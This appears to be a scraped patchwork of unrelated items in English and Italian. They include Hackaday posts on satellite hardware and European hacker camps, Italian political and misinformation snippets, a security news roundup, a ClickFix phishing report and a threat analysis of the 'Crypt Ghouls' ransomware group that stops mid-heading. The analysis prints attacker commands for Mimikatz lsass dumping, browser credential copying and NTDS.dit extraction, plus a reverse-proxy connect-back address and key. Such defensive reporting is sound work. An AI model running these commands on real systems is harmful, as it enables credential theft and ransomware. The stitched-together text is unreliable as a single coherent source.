As hackers, we’re always pulling stuff apart—sometimes just to see what it’s like inside. Most of us have seen the inside of a computer, television, and phone. These are all common items that we come into contact with every day. Fewer of us have dived inside real spacey satellite hardware, if only for the lack of opportunity. Some good gear has landed on [Don]’s desk over the years though, so he got to pulling it apart and peering inside.
[Don] starts us off with a gorgeous… box… of some sort from Hughes Aircraft. He believes it to be from their Space & Communications group, and it seems to have something to do with satellite communications work. Externally, he gleans that it takes power and data hookups and outputs RF to, something… but he’s not entirely sure. Inside, we get a look at the old 90s electronics — lots of through hole, lots of big chunky components, and plenty of gold plating. [Don] breaks down the circuitry into various chunks and tries to make sense of it, determining that it’s got some high frequency RF generators in the 20 to 40 GHz range.
Scroll through the rest of [Don]’s thread and you’ll find more gems. He pulls apart a microwave transmitter from Space Micro — a much newer unit built somewhere around 2008-2011. Then he dives into a mysterious I/O board from Broad Reach, and a very old Hughes travelling wave tube from the 1970s. The latter even has a loose link to the Ford Motor Company, believe it or not.
spesso la persona ignorante scaccia l'informazione come una zanzara fastidiosa e cerca "informazione" che dia sicurezza. ama anche arrabbiarsi visceralmente nelle fake new che propongono ad arte il designato cattivo di turno e permette in modo divertente di metterlo alla gogna e così di sfogarsi. in tutto questo l'attenzione per la ricerca di informazione corretta e utile è marginale. non c'è ricerca distintiva dei segni distintivi della fake new, di ricerca di reazione emotiva, di ricerca del valore della fonte. se tale persona ha una fantasia specifica, la sub-cultura che ne nasce attorno è benvenuta, purché confermi. una sub-cultura è un insieme di credenze e valori relativi, attorno alla quale si crea aggregazione sociale e diffusa. un esempio sono le gang all'interno di città usa. ma anche una religione, una credenza, un "valore" possono alimentare e diventare una sotto-cultura. una sottocultura non è "tossica" solo se sussiste la consapevolezza che questa rappresenta solo una parte di qualcosa più ampio e di valore maggiore.
This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss a tech near-catastrophe, data journalism, and breach rumors.#BehindTheBlog
This summer, I was pleasantly surprised when a friend of mine from Chicago turned up at one of the hacker camps I attended. A few days of hanging out in the sun ensued, doing cool hacker camp stuff, drinking unusual beverages, and generally having fun. It strikes me as a shame that this is such a rare occurrence, and since Hackaday is an American organisation and I am in a sense writing from its European outpost, I should do what I can to encourage my other friends from the USA and other parts of the world to visit. So here I’m trying to write a hacker’s guide to visiting Europe, in the hope that I’ll see more of you at future camps and other events.
It’s Intimidating. But Don’t Worry.
Yes. We’d find this intimidating, too. Bewitchedroutine, Public domain. First of all, I know that it’s intimidating to travel to an unfamiliar place where the language and customs may be different. I’m from England, which sits on a small island in the North Atlantic, and believe it or not it’s intimidating for us to start traveling too. It involves leaving the safety of home and crossing the sea whether by flight, ferry, or tunnel, and that lies outside one’s regular comfort zone.
Americans live in a country that’s almost a continent in its own right, so you can satisfy your travel lust without leaving home. Thus of course the idea of landing in Germany or the Netherlands is intimidating. But transatlantic flights are surprisingly cheap in the scheme of international travel because of intense competition, so I’m here to reassure you that you can travel my continent ‘s hacker community without either feeling out of your depth, or breaking the bank.
What About The Language Barrier?
Let’s start with the language. I’m a British English speaker, je parle Francais, een beetje Nederlands, and ein bischien Deutsch. (Ed note: errors left intact for authenticity.) The fact is though, while it’s nice to try my halting Dutch to buy a portion of haring en uitjes, the truth is I rarely find myself completely lost in my travels through the hacker community on just my native language. It may annoy the French to call English a lingua franca, but if you’re an Anglophone you’ve lucked out in having the international glue language at your fingertips. It’s the default translation when traveling, in major cities you will usually find people who speak it when you need to. Meanwhile we’re lucky enough that there are few cities which don’t have some form of hackerspace, so you can usually find someone friendly with local knowledge if you need a bit of advice.
So It’s Not As Scary As You Think, But Why Come Here?
Different countries take it in turns to host the year’s largest hacker camp. This is SHA2017, in the Netherlands. From here in Europe we look over the Atlantic at events like Def Con with some envy, but the fact is that Americans do things a little differently from us. Those events are expensive, while for us a summer hacker event is a community led affair in a field with camping thrown in. Some of the tickets are a few hundred dollars, but that’s it, no hotels, just camping in a field with five thousand other hackers.
Even better, the smaller events are cheaper, and often have much more charm as they aren’t so overwhelming. I can afford to do more than one, because they don’t cost an outrageous amount, and if I work out my timing I can even travel from one to the next without needing anywhere to stay over, instead helping with set-up and teardown. Add to that those hundreds of hackerspaces in cities only a relatively short distance apart, and there’s a lot to see.
Getting Around Needn’t Bankrupt You
Getting around with eurail is as simple as selecting your journey, and boarding the train. One of the great holidays of the world remains the Great North American Road Trip. Grab a car with a couple of friends, and head out across the wide open spaces on the roads less traveled. Eat at Mom-n-Pop roadside diners in flyspeck towns, and enjoy what the continent has to offer under that endless sky. But while hire cars and gasoline may be cheap in the USA, long distance driving is tedious, so Americans prefer to fly.
Europe is different, hire cars are expensive, gasoline is eye-wateringly expensive, and while budget flights can be cheap, they really are a royal pain in the ass. Fortunately our continent is still cris-crossed by an extensive passenger rail network, and while individual tickets can be expensive there’s a very handy hack that makes them a great choice for a tourist. It’s called the eurail pass, originally designed for young people but now available for all ages, and it offers universal access for visitors to the whole continent’s rail network.
Taking a train from Paris to Copenhagen is simply a case of punching the journey into the app, and doing it with 180 mph high-speed trains instead of slower regional trains usually only takes a few Euros extra booking fee. If you’ve ever wondered how I write about events all over Europe for Hackaday I can reveal that there’s no diamond-encrusted expense account, instead I use the domestic European version of this pass. It’s that good.
Where To Stay
BornHack is one of the smaller European hacker camps, offering a week in a Danish forest. If you are coming over for a hacker camp, there’s your campsite and event all rolled into one, but outside the camps there are still some affordable options. Starting with camping, for us it’s not the backwoods facilities of a trailhead camping spot but in most cases a commercial camp site. For not a huge a mount of money you’ll get toilets and showers along with your pitch, and even a 230V CEE-form power hook-up if you’re prepared to pay extra.
I’ve written Hackaday articles in more than one camp site in my time. Then if you have a eurail pass it’s worth noting that Europe has a night train network. If it’s a conventional sit-up train you might not have the most comfortable night, but for the extra cost of a sleeper berth you can swallow up the journey in comfort and have the day to do more interesting stuff. Then as everywhere it’s easy to find a hotel, I tend to aim for non-tourist-destination train stops and find a two-star room for about 50 to 70 Euros when I need one. And after a few nights camping and night training, you will need one. Finally as you wander around our continent’s hackerspaces you may find the occasional offer of a sofa for the night, but remember that most European houses are tiny and the etiquette around staying over may be a little different. Only expect to stay for a while and use someone’s place as a base if they really know you.
Day To Day
Try the local fast food, you won’t regret it. C van der, CC BY 2.0. It’s possible to exist in many European cities using small-denomination cash in whatever the local currency is, and shopping in ancient markets for exotic ingredients. It’s fun, even. But Europeans shop at the same shops and supermarkets as anyone else, and your Mastercard will work here too.
Look out for budget supermarkets, Aldi, Lidl, or Netto if you’re on a shoestring, and Primark if you’re in need of clothing. Meanwhile eating out can be expensive, and we don’t have a tradition of eating out for breakfast. We have McDonalds, Burger King, and KFC here just like anywhere else, but seek out the local fast food, it’s worth it.
European Hackerspaces
Wrapping it up, if you’re an American you may not be used to most hackerspaces only being a few tens of miles from each other. As a member of several European spaces it’s great to have international visitors drop by, so please, check out online when you go somewhere, find the space, and give them a shout. I have drunk Club-Mate and eaten a variety of delicacies while sitting on shabby sofas in the company of my peers continent-wide, and if you’re One of Us and looking to get to know a country there’s no better way.
So. The Hackaday Tourist Guide has spoken, are we going to see you at a European event next summer?
[quote]La due giorni di riunione tra i vertici della Difesa dell’Alleanza Atlantica, appena conclusasi, non ha costituito solo una delle prime occasioni per Mark Rutte, nuovo segretario generale della Nato subentrato a inizio mese, di rivolgersi agli Alleati ma anche un momento importante per ribadire il supporto
This week on the Podcast, Hackaday’s Elliot Williams and Kristina Panos joined forces to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
We love to see the add-ons people make for the badge every year, so this time around we’re really embracing the standard. The best SAOs will get a production run and they’ll be in the swag bag at Hackaday Europe 2025.
What’s That Sound pretty much totally stumped Kristina once again, although she kind of earned a half shirt. Can you get it? Can you figure it out? Can you guess what’s making that sound? If you can, and your number comes up, you get a special Hackaday Podcast t-shirt.
Then it’s on to the hacks, beginning with what actually causes warping in 3D prints, and a really cool display we’d never heard of. Then we’ll discuss the power of POKE when it comes to live coding music on the Commodore64, and the allure of CRTs when it comes to vintage gaming. Finally, we talk Hackaday comments and take a look at a couple of keyboards.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
The double-slit experiment, first performed by [Thomas Young] in 1801 provided the first definitive proof of the dual wave-particle nature of photons. A similar experiment can be performed that shows diffraction at optical frequencies by changing the reflectivity of a film of indium-tin-oxide (ITO), as demonstrated in an April 2024 paper (preprint) by [Romain Tirole] et al. as published in Nature Physics. The reflectivity of a 40 nm thick film of ITO deposited on a glass surface is altered with 225 femtosecond pulses from a 230.2 THz (1300 nm) laser, creating temporal ‘slits’. Interferogram of the time diffracted light as a function of slit separation (ps) and frequency (THz). (Credit: Tirole et al., Nature Physics, 2024) The diffraction in this case occurs in the temporal domain, creating frequencies in the frequency spectrum when a separate laser applies a brief probing pulse. The effect of this can be seen most clearly in an interferogram (see excerpt at the right). Perhaps the most interesting finding during the experiment was how quickly and easily the ITO layer’s reflectivity could be altered. With ITO being a very commonly used composition material that provides properties such as electrical conductivity and optical transparency which are incredibly useful for windows, displays and touch panels.
Although practical applications for temporal diffraction in the optical or other domains aren’t immediately obvious, much like [Young]’s original experiment the implications are likely to be felt (much) later.
Featured image: the conventional and temporal double-slit experiments, with experimental setup (G). (Credit: Tirole et al., Nature Physics, 2024)
@Politica interna, europea e internazionale «No alla grande finanza internazionale!», gridava Giorgia Meloni nel famoso discorso di Marbella, sul palco del partito franchista Vox. Era il 14 giugno 2022 e la leader di Fratelli d’Italia poteva ancora permettersi i toni aggressivi della «underdog»
ESET ha negato le accuse secondo cui i suoi sistemi sarebbero stati compromessi dopo che lo specialista della sicurezza Kevin Beaumont ha rivelato una campagna malevola che sembrava essere effettuata utilizzando l’infrastruttura ESET.
Secondo il blog di Beaumont, uno dei dipendenti dell’azienda israeliana è rimasto vittima del malware dopo aver aperto un collegamento in un’e-mail presumibilmente inviata dal team ESET Advanced Threat Defense in Israele. L’email ha superato con successo i controlli DKIM e SPF per il dominio ESET, ma Google Workspace l’ha contrassegnata come pericolosa. L’attacco è stato registrato l’8 ottobre ed era mirato a specialisti della sicurezza informatica in Israele. Il file dannoso è stato distribuito attraverso i server di ESET, con i destinatari che venivano avvertiti che l’attacco era stato effettuato da un aggressore “sostenuto dallo Stato”. Le vittime sono state inoltre incoraggiate a prendere parte al programma ESET Unleashed, che in realtà non esiste come iniziativa separata, sebbene sia menzionato nel marchio dell’azienda.
Il ricercatore ha trovato diverse DLL ESET e un file setup.exe dannoso nel file scaricato. Beaumont ha descritto il programma come un falso virusransomware che imita il lavoro del famoso malware Yanluowang. Beaumont ha inoltre notato che i file sui dispositivi non possono essere recuperati perché si tratta di un Viper .
Durante l’esecuzione, il malware ha contattato anche un’organizzazione legata all’Iron Swords War Day, dedicato alla memoria delle vittime dell’attacco del 7 ottobre 2023. I fatti suggeriscono il possibile coinvolgimento di hacktivisti.
ESET ha negato la versione di Beaumont sull’hacking dell’ufficio israeliano dell’azienda. L’azienda ha sottolineato che l’incidente ha colpito un’organizzazione partner in Israele e che la campagna dannosa è stata bloccata in 10 minuti. ESET ha assicurato di aver bloccato con successo la minaccia e che i clienti sono al sicuro. La società ha inoltre confermato che sta collaborando con il proprio partner alle indagini e continua a monitorare la situazione. La fonte dell’attività dannosa non è stata ancora identificata, ma i metodi utilizzati nell’attacco sono simili alle tattiche del gruppo filo-palestinese Handala. I ricercatori di Trellix hanno precedentemente riferito che Handala sta utilizzando attivamente dei dropper per attaccare le organizzazioni israeliane, rilevando centinaia di incidenti nell’arco di diverse settimane nel mese di luglio.
[quote]Le cronache recenti che giungono a noi soprattutto dall’Ucraina e dal Medio Oriente hanno permesso di delineare meglio il ruolo reale e concreto che lo spazio cibernetico assume nei moderni conflitti. In tal senso, appare evidente come emerga con chiarezza dall’ombra delle approssimazioni e degli hashtag sui social
Depending on who you ask, the big news this week is that quantum computing researchers out of China have broken RSA. And that’s true… sort of. There are multiple caveats, like the fact that this proof of concept is only factoring a 22-bit key. The minimum RSA size in use these days is 1024 bits. The other important note is that this wasn’t done on a general purpose quantum computer, but on a D-Wave quantum annealing machine.
First off, what is the difference between a general purpose and annealing quantum computer? Practically speaking, a quantum annealer can’t run Shor’s algorithm, the quantum algorithm that can factory large prime numbers in much sorter time than classical computers. While it’s pretty certain that this algorithm works from a mathematical perspective, it’s not at all clear that it will ever be possible to build effective quantum computers that can actually run it for the large numbers that are used in cryptography.
We’re going to vastly oversimplify the problem, and say that the challenge with general purpose quantum computing is that each q-bit is error prone, and the more q-bits a system has, the more errors it has. This error rate has proved to be a hard problem. The D-wave quantum annealing machine side-steps the issue by building a different sort of q-bits, that interact differently than in a general purpose quantum computer. The errors become much less of a problem, but you get a much less powerful primitive. And this is why annealing machines can’t run Shor’s algorithm.
The news this week is that researchers actually demonstrated a different technique on a D-wave machine that did actually factor an RSA key. From a research and engineering perspective, it is excellent work. But it doesn’t necessarily demonstrate the exponential speedup that would be required to break real-world RSA keys. To put it into perspective, you can literally crack a 22 bit RSA key by hand.
Zendesk Out of Scope
Here’s an example of two things. First off, a bug being out of scope for a bounty shouldn’t stop a researcher from working on a bug. Second, it’s worth being extra careful in how a bug bounty’s scope is set up, as sometimes bugs have unforeseen consequences. We’re talking here about Zendesk, a customer support tool and ticket manager. [Daniel] found an issue where an attacker could send an email to the support email address from a spoofed sender, and add an arbitrary email address to the ticket, gaining access to the entire ticket history.
Because the problem was related to email spoofing, and the Zendesk bounty program on HackerOne considers “SPF, DKIM, and DMARC” to be out of scope, the ticket was closed as “informative” and no bounty awarded. But [Daniel] wasn’t done. What interesting side effects could he find? How about triggering single sign on verification to go to the support email address? Since an Apple account can be used to sign on to slack, an attacker can create an apple account using the support email address, use the email spoof to get access to the created bug, and therefore the one-time code. Verify the account, and suddenly you have an Apple account at the target’s domain. [Daniel] used this to gain access to company Slack channels, but I’d guess this could be used for even more mayhem at some businesses.
Given that the original bug report was closed as “informational”, [Daniel] started reporting the bug to other companies that use Zendesk. And it paid off, netting more than $50,000 for the trouble. Zendesk never did pay a bounty on the find, but did ask [Daniel] to stop telling people about it.
Fortinet Fixed It
The good folks at Watchtowr Labs have the inside scoop on a recently fixed vulnerability in Fortinet’s FortiGate VPN appliance. It’s a good fix found internally by Fortinet, and gives us a good opportunity to talk about a class of vulnerability we haven’t ever covered. Namely, a format string vulnerability.
The printf() function and its siblings are wonderful things. You give it a string, and it prints it to standard output. You give it a string that contains a format specifier, like %s, and it will replace the specifier with the contents of a variable passed in as an additional argument. I write a lot of “printf debugging” code when trying to figure out a problem, that looks like printf("Processing %d bytes!\n", length);
What happens if the specifier doesn’t match the data type? Or if there is a specifier and no argument? You probably know the answer: Undefined behavior. Not great for device security. And in this case, it does lead to Remote Code Execution (RCE). The good news is that Fortinet found this internally, and the fix was quietly made available in February. The bad news is that attackers found it, and have since been actively using it in attacks.
Escape!
[ading2210] has the story of finding a pair of attack chains in Google Chrome/Chromium, where a malicious extension can access the chrome://policy page, and define a custom “browser” command to use when accessing specific pages. There are two separate vulnerabilities that can be used to pull off this trick. One is a race condition where disallowed JS code can run before it’s disabled after a page reload, and the other is a crash in the page inspector view. That’s not a page non-developers have a habit of visiting, so the browser extension just pulls a fast one on install, launching a simple page that claims that something went wrong, asking the user to press f12 to troubleshoot.
At this point, most of us rely on Linux for our routers and firewalls. Whether you realize it or not, it’s extremely likely that that little magical box that delivers Internet goodness to your devices is a Linux machine, running iptables as the firewall. And while iptables is excellent at its job, it does have its share of quirks. Researchers at Anvil have the low down on ESTABLISHED connection spoofing.
Iptables, when run on the boarder between networks, is often set to block incoming packets by default, and allow outgoing. The catch is that you probably want responses to your requests. To allow TCP connections to work both ways, it’s common to set iptables to allow ESTABLISHED connections as well. If the IP addresses and ports all match, the packet is treated as ESTABLISHED and allowed through. So what’s missing? Unless you explicitly request it, this firewall isn’t checking that the source port is the one you expected. Packets on one interface just might get matched to a connection on a different interface and passed through. That has some particularly interesting repercussions for guest networks and the like.
Bits and Bytes
On the topic of more secure Linux installs, [Shawn Chang] has thoughts on how to run a container more securely. The easy hint is to use Podman and run rootless containers. If you want even tighter protection, there are restrictions on system calls, selinux, and a few other tricks to think about.
Check the logs! That’s the first step to looking for a breach or infection, right? But what exactly are you looking for? The folks at Trunc have thoughts on this. The basic idea is to look for logins that don’t belong, IPs that shouldn’t be there, and other specific oddities. It’s a good checklist for trouble hunting.
And finally, the playlist from DEF CON 32 is available! Among the highlights are [Cory Doctorow] talking about the future of the Internet, [HD Moore] and [Rob King] talking about SSH, and lots lots more!
Nelle nuove campagne ClickFix, i truffatori attirano gli utenti su false pagine di Google Meet dove vengono mostrati falsi errori di connessione per diffondere malware che possono infettare i sistemi Windows e macOS.
ClickFix risale a maggio, quando Proofpoint ne ha segnalato per la prima volta l’utilizzo da parte del gruppo TA571. Gli attacchi hanno utilizzato falsi messaggi di errore in Google Chrome, Microsoft Word e OneDrive. Alle vittime è stato chiesto di incollare il codice nella riga di comando di PowerShell per risolvere il presunto problema, che ha portato all’infezione dei loro dispositivi. Malware come DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, Lumma Stealer e altri sono stati distribuiti attraverso questo metodo. Nel mese di luglio, McAfee ha riscontrato un aumento nella frequenza di questi attacchi, soprattutto negli Stati Uniti e in Giappone.
Secondo un nuovo rapporto di Sekoia, le tattiche di ClickFix sono recentemente cambiate, con gli aggressori che utilizzano falsi inviti di Google Meet e inviano e-mail di phishing mirate alle società di spedizione e logistica.
Nuovi trucchi includono pagine Facebook false e discussioni GitHub false. Sekoia collega anche le recenti campagne a due gruppi, Slavic Nation Empire (SNE) e Scamquerteo, che si ritiene facciano parte dei gruppi truffatori di criptovaluta Marko Polo e CryptoLove.
Gli attacchi tramite Google Meet sembrano particolarmente convincenti: gli aggressori inviano e-mail con link falsi che imitano quelli ufficiali:
incontra[.]google[.]noi-unisciti[.]com
incontra[.]google[.]web-join[.]com
incontra[.]googie[.]com-unisciti[.]a noi
Dopo aver visitato tali pagine, agli utenti viene mostrato un messaggio relativo a un presunto problema con il microfono o le cuffie. Un tentativo di “correggere” l’errore attiva lo script ClickFix standard: il codice PowerShell dannoso viene eseguito tramite la riga di comando, scaricando malware dal dominio “googiedrivers[.]com”.
Per i dispositivi Windows, viene scaricato Stealc o Rhadamanthys e su macOS, AMOS Stealer è installato nel formato “.DMG” chiamato “Launcher_v194“. Oltre a Google Meet, gli aggressori utilizzano anche altre piattaforme per distribuire malware, tra cui Zoom, falsi lettori PDF, videogiochi falsi e progetti web3.
@Notizie dall'Italia e dal mondo "Ho vissuto la mia Nakba personale e capisco perché migliaia di palestinesi sono fuggiti dalle loro case nel 1948. Ho preso la decisione più difficile della mia vita e ho lasciato Gaza, senza sapere che quello che portavo con me sarebbe stato tutto ciò che avrei mai
@Notizie dall'Italia e dal mondo Khalil Al Hayya ha confermato oggi la morte del leader, promettendo che Hamas continuerà a combattere fino al ritiro di Israele da Gaza L'articolo SINWAR. Hamas conferma la sua uccisione. Netanyahu: “L’offensiva a Gaza continua” proviene da Pagine
@Notizie dall'Italia e dal mondo La polizia federale brasiliana ha richiesto la cattura di decine di golpisti, vicini all'ex presidente Bolsonaro, che sono fuggiti in Argentina e in altri paesi L'articolo Il Brasile chiede all’Argentina l’estradizione di decine di golpisti proviene da Pagine Esteri.
These days, when something electronic breaks, most folks just throw it away and get a new one. But as hackers, we prefer to find out what the actual problem is and fix it. [Bonsembiante] took that very tack when a MOTU brand audio interface wasn’t booting. As it turns out, a bit of investigative work led to a simple and viable fix.
The previous owner had tried to get the unit fixed multiple times without success. When it ended up on [Bonsembiante]’s bench, reverse engineering was the order of the day. Based around an embedded Linux system, there was lots to poke and prod at inside, it’s just that… the system wasn’t booting, wasn’t showing up over USB or Ethernet, or doing much of anything at all.
Extracting the firmware only revealed that the firmware was actually valid, so that was a dead end. However, after some work following the boot process along in Ghidra, with some external help, the problem was revealed. Something was causing the valid firmware to fail the bootloader’s checks—and with that fixed, the unit booted. You’ll have to read the article to get the full juicy story—it’s worth it!
Oggi, 18 ottobre 2024, si sono tenute la nona e la decima lezione del corso di Storia della filosofia francese (corso di laurea in Filosofia). Il corso, intitolato “Percorsi di metafisica nel Novec…
Last December, we discovered a new group targeting Russian businesses and government agencies with ransomware. Further investigation into this group’s activity suggests a connection to other groups currently targeting Russia. We have seen overlaps not only in indicators of compromise and tools, but also tactics, techniques, and procedures (TTPs). Moreover, the infrastructure partially overlaps across attacks.
The group under review has a toolkit that includes utilities such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet, resocks, AnyDesk, PsExec, and others. As the final payload, the group used the well-known ransomware LockBit 3.0 and Babuk. We have dubbed the group “Crypt Ghouls”.
Delivery and persistence
It was only in two of the group’s attacks that we were able to determine the initial access vector. The attackers used a contractor’s login information to connect to the victim’s internal systems via a VPN. The VPN connections were established from IP addresses associated with a Russian hosting provider’s network and a contractor’s network. Nowadays attackers are increasingly gaining initial access through their targets’ contractors. We suspect that contractors are compromised via VPN services or unpatched vulnerabilities.
To maintain access to the system, the attackers used the NSSM and Localtonet utilities. NSSM creates and manages services on a host, while Localtonet provides an encrypted tunnel for connecting to that host from an external network. Both utilities were downloaded directly from localtonet.com: hxxp://localtonet.com/nssm-2.24.zip hxxp://localtonet.com/download/localtonet-win-64.zip
Harvesting login credentials
XenAllPasswordPro
The attackers employed the XenAllPasswordPro tool to harvest a range of authentication data from the target system. cmd.exe /Q /c c:\programdata\allinone2023\XenAllPasswordPro.exe -a c:\programdata\report.html 1> \Windows\Temp\LNhkey 2>&1
cmd.exe /Q /c cmd /c rmdir /q /s c:\programdata\allinone2023 1> \Windows\Temp\HYirzI 2>&1 This utility and the path to it, “\allinone2023\”, are characteristic of this series of attacks. Following is a list of locations for XenAllPasswordPro that we have observed in various victim infrastructures.
The parent process for the commands above was wmiprvse.exe. Moreover, we found an Impacket artifact in command-line output. These are signs of using the Impacket WmiExec.py module:C:\Windows\System32\wbem\wmiprvse.exe In one Crypt Ghouls attack, we discovered a malicious CobInt backdoor loader. This is a telltale tool that allowed us to draw parallels with other campaigns. The CobInt downloader we encountered is a VBScript called Intellpui.vbs that executes obfuscated PowerShell code. This code, in turn, communicates with a C2 server to load the CobInt backdoor into memory. In other cases, hackers used RDP instead of WMI. c:\windows\system32\rdpclip.exe c:\programdata\1c\allinone2023\xenallpasswordpro.exe -a c:\programdata\1c\2c.txt Additionally, we noticed that in certain attacks, the HKLM\SECURITY registry hive was being saved to a temporary folder. The hive stores the host’s security policies and the secrets managed by the Local Security Authority.C:\Windows\System32\svchost.exe -k localService -p -s RemoteRegistry
RegSaveKey("$hklm\security","$temp\kjzcehld.tmp")
Mimikatz
We detected the use of the Mimikatz utility in some of the investigated attacks. One case involved injection of malicious code from the utility into the memory of the rundll32.exe process. In another, a Mimikatz command was used to dump the memory of the lsass.exe process. This holds various login details of authenticated users:sekurlsa::minidump lsass.dmp In this way, attackers used Mimikatz to extract victims’ credentials.
dumper.ps1
Crypt Ghouls ran an open-source PowerShell script that allowed them to dump Kerberos tickets from the LSA cache. The attackers renamed it to disguise it as a Group Policy script. .\gpo_compliance.ps1
MiniDump Tool
MiniDump Tool is a utility designed to create a memory dump of a specified process. It helped Crypt Ghouls to extract login credentials from the memory of lsass.exe. The attackers initiated this by running the following command:T.exe [lsass_pid] [lsass_pid]The first argument is the process ID (PID). The second argument is the file name and directory to save the dump of the selected process to.
The MiniDump Tool creates a driver at the following path: C:\Users\[username]\AppData\Local\Temp\kxxxxxxx.sys Next, it runs the driver and passes to it a control code to read the memory of the process whose identifier is specified as the first argument, then it saves the dump in the system, in this case — in a file in the current directory while using the process ID as its name.
Login credentials from browsers
Crypt Ghouls also copied files containing credentials stored in browsers to a temporary directory: cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1713909129.8364425"
cmd.exe /Q /c copy "C:\Users\[username]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1713909181.5850394" The commands on the hosts were run via WMI.
The attackers then used PowerShell to request a list of local users: c:\windows\system32\wbem\wmiprvse.exe > cmd.exe /Q /c powershell.exe "Get-LocalUser | Select name" 1> \Windows\Temp\qnLJbp 2>&1"
NTDS.dit dump
Crypt Ghouls connected to the domain controller with compromised credentials via WMI. After establishing the connection, they tried to save the NTDS.dit dump. The attackers leveraged an existing scheduler task to obtain the dump. They modified the task four times. First, they obtained the NTDS.dit dump with the Ntdsutil utility. Then they archived the folder containing the dump and deleted the folder. The final change to the scheduler task restored its original value.powershell.exe out-file -inputobject (ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\programdata\activedirectory' q q) -encoding utf8 - filepath c:\programdata\microsoft\vault\dabbf27c-37ef-9946-a3d3- 7aaaebce7577
powershell.exe out-file -inputobject (cmd /c rmdir /q /s c:\programdata\activedirectory) - encoding utf8 -filepath c:\programdata\microsoft\vault\a5ad25f1-f569-6247-0722- ad6fe54e350f The 7-Zip utility was also downloaded from GitHub: github.com/ip7z/7zip/releases/… However, we did not detect any further data exfiltration after the archiving.
Network reconnaissance and spread
Crypt Ghouls used the PingCastle utility (MD5: F4A84D6F1CAF0875B50135423D04139F) to collect information about the infrastructure of the domain they resided in. Additionally, the attackers periodically scanned the network using the legitimate utility SoftPerfect Network Scanner to identify open ports and network shares.
As we mentioned above, the attackers used the WmiExec.py Impacket module for network navigation. We found that two of the targets had PAExec, a remote command tool, running on their systems at some point:c:\windows\paexec-[xxxxx]-[source_host_redacted].exe -service cmd
Infrastructure
Crypt Ghouls uses several remote access utilities. AnyDesk was the most commonly used tool according to our research, but the attackers employed a variety of other methods as well. The table below presents the names of the utilities and the directories where they were found.
Name
Directory
AnyDesk
C:\Users\[redacted]\Downloads\AnyDesk.exe
Localtonet
C:\Windows\Temp\localtonet.exe
resocks
/usr/sbin/xfs-modules
The IP addresses used for remote connections to AnyDesk and Localtonet belonged to a Surfshark VPN subnet.
Resocks is a reverse SOCKS5 proxy for tunneling traffic. While investigating this group’s activity, we found a proxy sample that was configured to use the IP address 91.142.73[.]178, which is part of the hosting provider VDSina’s network.
Below are the notable parameters of the resocks sample, which provide additional context for the research: -X main.defaultConnectBackAddress=91.142.73[.]178 -X main.defaultConnectionKey=CzKDvHM8UGE/QtjuF2SSkJzaVmRpjNipdWlbTzFry6o
DLL sideloading
The malicious actor used the DLL sideloading technique by placing a legitimate Windows installer management application, dism.exe, and a malicious loader, dismcore.dll, in the same folder: c:\ProgramData\oracle\. The dismcore.dll loader attempted to locate the file odbcconf.xml, which contained the payload, but we were unable to retrieve that file.
File encryption
The attackers encrypted data with publicly available versions of the popular LockBit 3.0 (for Windows systems) and Babuk (for Linux) malware. The LockBit sample we analyzed was configured with commands to encrypt local drives, terminate specific processes and services, disable Windows Defender, and delete event logs. The ransomware added system directories, as well as a folder named intel where the attackers loaded tools to harvest credentials, to the encryption exclusions list. A snippet of the LockBit 3.0 sample’s configuration
We noticed something strange about how a victim’s files were encrypted. First, LockBit encrypted files with specific extensions, as defined in its sample configuration. These are the files that the attackers may find most valuable. Besides these, the malware encrypts files in the recycle bin while inserting random characters in these. Beyond the primary algorithm, we found a cycle that systematically renamed the original file in the recycle bin. This process iterated through every letter of the English alphabet, continuing until it reached the last one. This type of encryption makes it really hard, or even impossible, to recover the user’s files.
The file renaming cycle
Below is an example of how this appears in logs: File Renamed c:\$recycle.bin\[redacted]\desktop.ini c:\$recycle.bin\[redacted]\aaaaaaaaaaa File Renamed c:\$recycle.bin\[redacted]\aaaaaaaaaaa c:\$recycle.bin\[redacted]\bbbbbbbbbbb File Renamed c:\$recycle.bin\[redacted]\bbbbbbbbbbb c:\$recycle.bin\[redacted]\ccccccccccc File Renamed c:\$recycle.bin\[redacted]\ccccccccccc c:\$recycle.bin\[redacted]\ddddddddddd The algorithm then attempts to delete the last version of c:\$recycle.bin\[redacted]\zzzzzzzzzzz.
The attackers leave a ransom note with a link containing their ID in the Session messaging service for future contact:
A LockBit 3.0 ransom note
Session supports end-to-end encryption, which minimizes the risk of data breaches. The developers claim their messaging service is built to guarantee complete privacy. Session has been used by other ransomware groups, such as GhostLocker, SEXi, and MorLock, in their attacks.
Additionally, attackers targeted ESXi servers with the Babuk ransomware. They would connect to the ESXi server via SSH, upload Babuk, and initiate the encryption process for the files within the virtual machines: /tmp/lock.out "/vmfs/volumes/[redacted]" We believe the goal of the attackers was to disrupt the targeted organizations’ operations, besides financial gain.
Links to other groups
We are seeing a lot of overlap in the tools and techniques used by cybercriminals targeting Russian businesses and government agencies. Below, we outline the key similarities we found in attacks by different groups.
MorLock
MorLock activities, as investigated by F.A.C.C.T., shares many features with several of the attacks we analyzed for this report. The groups share most of the tools they use: SoftPerfect Network Scanner, XenAllPasswordPro, AnyDesk, PingCastle, Localtonet, NSSM, resocks, LockBit 3.0, and Babuk.
The file and folder names used in attacks by both groups also show similarities. Thus we found a resocks utility named “xfs-healthcheck”, a name that follows the same template as the resocks names on the list of indicators published by F.A.C.C.T.: [xxx]-healthcheck. We noticed a further similarity when studying the XenAllPasswordPro utility: in MorLock attacks, it was located in a directory named “allinone2023”.
Furthermore, we checked the MorLock infrastructure as reported by F.A.C.C.T., only to find that the group also used Surfshark VPN and the VDSina hosting services provider.
BlackJack
While investigating the utilities used in Crypt Ghouls attacks, we found an overlap with the toolkit employed by the BlackJack group, which also used XenAllPasswordPro. This caught our attention, as XenAllPasswordPro is not the most popular tool among cybercriminals despite being freely available.
Twelve
We have seen XenAllPasswordPro used in attacks by Twelve too. Furthermore, we discovered Intellpui.vbs, a loader for CobInt, also used by Twelve, on one of the systems attacked by Crypt Ghouls.
Shedding Zmiy
